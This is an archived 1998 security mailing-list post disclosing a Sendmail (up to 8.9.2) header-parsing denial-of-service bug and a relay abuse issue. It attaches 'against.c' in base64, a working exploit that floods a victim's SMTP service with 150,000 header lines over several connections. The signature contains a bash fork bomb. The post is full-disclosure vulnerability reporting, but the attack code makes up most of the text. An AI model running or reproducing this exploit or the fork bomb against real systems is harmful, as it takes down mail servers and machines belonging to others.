This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mimeat_private for more info. --8323328-1197535808-913486907=:294 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: <Pine.LNX.4.05.9812121921581.294at_private> Hello again. Yesterday, I published some rather laconic information about two bugs in Sendmail up to 8.9.2, and decided to post only short description of problem + suggested patch (instead of exploit), to give developers a chance. Unfortunately, I put together information about two completely different problems in single posting, and it confuded a lot of people. So, to kill any senseless discussions - again: - The first one was 'redirection attack'; I said you could call it 'bug' instead of 'feature', but as noone likes anonymous mailbombing, network overloading / scanning, it's good to apply sendmail.cf patch included in original posting; without it, your relay could be abused in many painful ways. And yes, attack has been confirmed with 8.9.2 and sendmail.cf from 8.9.2 with relaying enabled. I don't think there's anything left to talk about. Dot. - The second one was DoS attack during headers parsing - and this is a bug, *confirmed on 8.9.2*. I included simple patch to source tree. Unfortunately, all feedback we received from developers was one-line response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided not to publish an exploit, but now I realized there's no chance for response from vendors if there's no real danger. So here it is. Attached file, against.c, should perform very 'light' attack, only for testing purposes. If you noticed increased LA during attack, your machine is vunerable. You had enough time to patch your system - don't blame me, but vendors. EOF. _______________________________________________________________________ Michal Zalewski [lcamtufat_private] [ENSI / marchew] [dione.ids.pl SYSADM] [http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] --8323328-1197535808-913486907=:294 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="against.c" Content-Transfer-Encoding: BASE64 Content-ID: <Pine.LNX.4.05.9812121921470.294at_private> Content-Description: Content-Disposition: ATTACHMENT; FILENAME="against.c" LyoNCiAgYWdhaW5zdC5jIC0gQW5vdGhlciBTZW5kbWFpbCAoYW5kIHBpbmUg Oy0pIERvUyAodXAgdG8gOC45LjIpDQogIChjKSAxOTk5IGJ5IDxtYXJjaGV3 QGxpbnV4LmxlcHN6eS5vZC5rb2JpZXR5LnBsPg0KDQogIFVzYWdlOiAuL2Fn YWluc3QgZXhpc3RpbmdfdXNlcl9vbl92aWN0aW1faG9zdCB2aWN0aW1faG9z dA0KICBFeGFtcGxlOiAuL2FnYWluc3Qgbm9ib2R5IGxhbWVycy5uZXQNCg0K Ki8NCg0KI2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+ DQojaW5jbHVkZSA8c3lzL3BhcmFtLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tl dC5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8bmV0aW5l dC9pbi5oPg0KI2luY2x1ZGUgPG5ldGRiLmg+DQojaW5jbHVkZSA8c3RkYXJn Lmg+DQojaW5jbHVkZSA8ZXJybm8uaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4N CiNpbmNsdWRlIDxnZXRvcHQuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNp bmNsdWRlIDxzdHJpbmcuaD4NCg0KI2RlZmluZSBNQVhDT05OIDUNCiNkZWZp bmUgTElORVMgICAxNTAwMDANCg0Kc3RydWN0IGhvc3RlbnQgKmhwOw0Kc3Ry dWN0IHNvY2thZGRyX2luIHM7DQppbnQgc3Vjayxsb29wLHg7DQoNCmludCBt YWluKGludCBhcmdjLGNoYXIqIGFyZ3ZbXSkgew0KICANCiAgcHJpbnRmKCJh Z2FpbnN0LmMgLSBhbm90aGVyIFNlbmRtYWlsIERvUyAodXAgdG8gOC45LjIp XG4iKTsNCg0KICBpZiAoYXJnYy0zKSB7DQogICAgcHJpbnRmKCJVc2FnZTog JXMgdmljdGltX3VzZXIgdmljdGltX2hvc3RcbiIsYXJndlswXSk7DQogICAg ZXhpdCgwKTsNCiAgfQ0KICAgIA0KICBocD1nZXRob3N0YnluYW1lKGFyZ3Zb Ml0pOw0KICANCiAgaWYgKCFocCkgew0KICAgIHBlcnJvcigiZ2V0aG9zdGJ5 bmFtZSIpOw0KICAgIGV4aXQoMSk7DQogIH0NCg0KICBmcHJpbnRmKHN0ZGVy ciwiRG9pbmcgbWVzczogIik7DQoNCiAgZm9yICg7bG9vcDxNQVhDT05OO2xv b3ArKykgaWYgKCEoeD1mb3JrKCkpKSB7DQogICAgRklMRSogZDsNCiAgICBi Y29weShocC0+aF9hZGRyLCh2b2lkKikmcy5zaW5fYWRkcixocC0+aF9sZW5n dGgpOw0KICAgIHMuc2luX2ZhbWlseT1ocC0+aF9hZGRydHlwZTsNCiAgICBz LnNpbl9wb3J0PWh0b25zKDI1KTsNCiAgICBpZiAoKHN1Y2s9c29ja2V0KEFG X0lORVQsU09DS19TVFJFQU0sMCkpPDApIHBlcnJvcigic29ja2V0Iik7DQog ICAgaWYgKGNvbm5lY3Qoc3Vjaywoc3RydWN0IHNvY2thZGRyICopJnMsc2l6 ZW9mKHMpKSkgcGVycm9yKCJjb25uZWN0Iik7DQogICAgaWYgKCEoZD1mZG9w ZW4oc3VjaywidyIpKSkgeyBwZXJyb3IoImZkb3BlbiIpOyBleGl0KDApOyB9 DQoNCiAgICB1c2xlZXAoMTAwMDAwKTsNCg0KICAgIGZwcmludGYoZCwiaGVs byB0d2VldHlcbiIpOw0KICAgIGZwcmludGYoZCwibWFpbCBmcm9tOiB0d2Vl dHlAcG9sYm94LmNvbVxuIik7DQogICAgZnByaW50ZihkLCJyY3B0IHRvOiAl c0Alc1xuIixhcmd2WzFdLGFyZ3ZbMl0pOw0KICAgIGZwcmludGYoZCwiZGF0 YVxuIik7DQoNCiAgICB1c2xlZXAoMTAwMDAwKTsNCg0KICAgIGZvcihsb29w PTA7bG9vcDxMSU5FUztsb29wKyspIHsNCiAgICAgIGlmICghKGxvb3AlMTAw KSkgZnByaW50ZihzdGRlcnIsIi4iKTsNCiAgICAgIGZwcmludGYoZCwiVG86 IHhcbiIpOw0KICAgIH0NCg0KICAgIGZwcmludGYoZCwiXG5cblxuc29tZWRh dGFcblxuXG4iKTsNCg0KICAgIGZwcmludGYoZCwiLlxuIik7DQoNCiAgICBz bGVlcCgxKTsNCg0KICAgIGZwcmludGYoZCwicXVpdFxuIik7DQogICAgZmZs dXNoKGQpOw0KDQogICAgc2xlZXAoMTAwKTsNCiAgICBzaHV0ZG93bihzdWNr LDIpOw0KICAgIGNsb3NlKHN1Y2spOw0KICAgIGV4aXQoMCk7DQogIH0NCg0K ICB3YWl0cGlkKHgsJmxvb3AsMCk7DQoNCiAgZnByaW50ZihzdGRlcnIsIm9r XG4iKTsNCg0KICByZXR1cm4gMDsNCn0NCg0K --8323328-1197535808-913486907=:294--
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:29:16 PDT